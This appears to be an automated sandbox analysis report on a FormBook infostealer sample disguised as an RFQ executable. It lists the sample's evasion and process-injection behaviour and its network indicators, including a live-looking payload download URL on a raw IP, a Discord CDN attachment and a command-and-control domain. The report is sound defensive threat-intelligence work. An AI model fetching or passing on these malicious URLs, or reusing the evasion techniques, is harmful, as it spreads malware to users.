Source: Binary string: C:\Users\user\Desktop\RealProxyFlagsBadSignature.pdbd source: RFQ- 7075-T6.exe, 00000000.00000002.237468256.0000000004B90000.00000004.08000000.00040000.00000000.sdmp

Data Obfuscation
barindex
.NET source code contains potential unpacker
Source: RFQ- 7075-T6.exe, CodeAnalysis.Hosting.Server.Features/DWLcvAvOeZDcRlX.cs .Net Code: Main System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.RFQ- 7075-T6.exe.210000.0.unpack, CodeAnalysis.Hosting.Server.Features/DWLcvAvOeZDcRlX.cs .Net Code: Main System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: C:\Users\user\Desktop\RFQ- 7075-T6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ- 7075-T6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ- 7075-T6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ- 7075-T6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ- 7075-T6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ- 7075-T6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ- 7075-T6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ- 7075-T6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ- 7075-T6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ- 7075-T6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ- 7075-T6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ- 7075-T6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ- 7075-T6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ- 7075-T6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ- 7075-T6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ- 7075-T6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ- 7075-T6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ- 7075-T6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ- 7075-T6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ- 7075-T6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ- 7075-T6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ- 7075-T6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ- 7075-T6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ- 7075-T6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ- 7075-T6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ- 7075-T6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ- 7075-T6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ- 7075-T6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ- 7075-T6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ- 7075-T6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ- 7075-T6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ- 7075-T6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ- 7075-T6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ- 7075-T6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ- 7075-T6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ- 7075-T6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ- 7075-T6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ- 7075-T6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\RFQ- 7075-T6.exe TID: 5556 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\RFQ- 7075-T6.exe TID: 2916 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\RFQ- 7075-T6.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\RFQ- 7075-T6.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: RFQ- 7075-T6.exe, 00000000.00000002.232496959.0000000002637000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dNzNYQSUljWcBlQqPDeHvVpwRwqGflvJnFDQLZGSGiFLHhruHXAHoctpsXQwaLozINpRhUfKShWMkeoEFQaeNzNYQSUljWcBlQqPDeHvVpwRwqGflvJnFDQLZGSGiFLHhruHXAHoctpsXQwaLozINpRhUfKShWMkeoEFQrhTNzNYQSUljWcBlQqPDeHvVpwRwqGflvJnFDQLZGSGiFLHhruHXAHoctpsXQwaLozINpRhUfKShWMkeoEFQemuNzNYQSUljWcBlQqPDeHvVpwRwqGflvJnFDQLZGSGiFLHhruHXAHoctpsXQwaLozINpRhUfKShWMkeoEFQseRNzNYQSUljWcBlQqPDeHvVpwRwqGflvJnFDQLZGSGiFLHhruHXAHoctpsXQwaLozINpRhUfKShWMkeoEFQ
Source: RFQ- 7075-T6.exe, 00000000.00000002.232496959.0000000002637000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: kQeMuGIULxzSSWBFvoGmFrytHnvtzMnrinyuvSjZQcGjDOtBUdtvkjXdoFFcKkpUJHFzXHecaBrdlOKNOPZ
Source: RFQ- 7075-T6.exe, 00000000.00000002.237468256.0000000004B90000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: CdNzNYQSUljWcBlQqPDeHvVpwRwqGflvJnFDQLZGSGiFLHhruHXAHoctpsXQwaLozINpRhUfKShWMkeoEFQaeNzNYQSUljWcBlQqPDeHvVpwRwqGflvJnFDQLZGSGiFLHhruHXAHoctpsXQwaLozINpRhUfKShWMkeoEFQrhTNzNYQSUljWcBlQqPDeHvVpwRwqGflvJnFDQLZGSGiFLHhruHXAHoctpsXQwaLozINpRhUfKShWMkeoEFQemuNzNYQSUljWcBlQqPDeHvVpwRwqGflvJnFDQLZGSGiFLHhruHXAHoctpsXQwaLozINpRhUfKShWMkeoEFQseRNzNYQSUljWcBlQqPDeHvVpwRwqGflvJnFDQLZGSGiFLHhruHXAHoctpsXQwaLozINpRhUfKShWMkeoEFQ
Enables debug privileges
Source: C:\Users\user\Desktop\RFQ- 7075-T6.exe Process token adjusted: Debug Jump to behavior
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\RFQ- 7075-T6.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\RFQ- 7075-T6.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\RFQ- 7075-T6.exe Memory written: C:\Users\user\Desktop\RFQ- 7075-T6.exe base: 3C0000 value starts with: 4D5A Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\RFQ- 7075-T6.exe Process created: C:\Users\user\Desktop\RFQ- 7075-T6.exe C:\Users\user\Desktop\RFQ- 7075-T6.exe Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\RFQ- 7075-T6.exe Queries volume information: C:\Users\user\Desktop\RFQ- 7075-T6.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ- 7075-T6.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ- 7075-T6.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ- 7075-T6.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected FormBook
Source: Yara match File source: 1.0.RFQ- 7075-T6.exe.3c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.237260939.00000000035F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.230933027.00000000003C1000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.237294660.0000000003619000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality
barindex
Yara detected FormBook
Source: Yara match File source: 1.0.RFQ- 7075-T6.exe.3c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.237260939.00000000035F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.230933027.00000000003C1000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.237294660.0000000003619000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 680627 Sample: RFQ- 7075-T6.exe Startdate: 08/08/2022 Architecture: WINDOWS Score: 100 28 Multi AV Scanner detection for domain / URL 2->28 30 Malicious sample detected (through community Yara rule) 2->30 32 Antivirus detection for URL or domain 2->32 34 6 other signatures 2->34 7 RFQ- 7075-T6.exe 15 3 2->7         started        process3 dnsIp4 22 cdn.discordapp.com 162.159.135.233, 443, 49739 CLOUDFLARENETUS United States 7->22 24 109.206.241.81, 49741, 80 AWMLTNL Germany 7->24 18 C:\Users\user\...\RFQ- 7075-T6.exe.log, ASCII 7->18 dropped 36 Injects a PE file into a foreign processes 7->36 12 RFQ- 7075-T6.exe 7->12         started        file5 signatures6 process7 process8 14 WerFault.exe 23 9 12->14         started        dnsIp9 26 192.168.2.1 unknown unknown 14->26 20 C:\ProgramData\Microsoft\...\Report.wer, Little-endian 14->20 dropped file10
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
109.206.241.81
 unknown Germany
209929 AWMLTNL false
162.159.135.233
 cdn.discordapp.com United States
13335 CLOUDFLARENETUS false

Private

IP
192.168.2.1

Contacted Domains

Name IP Active
cdn.discordapp.com 162.159.135.233 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://109.206.241.81/htdocs/qWDXb.exe true
  • 16%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
www.lafuriaroja.team/jn86/ true
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
 low
https://cdn.discordapp.com/attachments/1005703293437235255/1005705055426588785/RealProxyFlagsBadSignature.dll false
    		high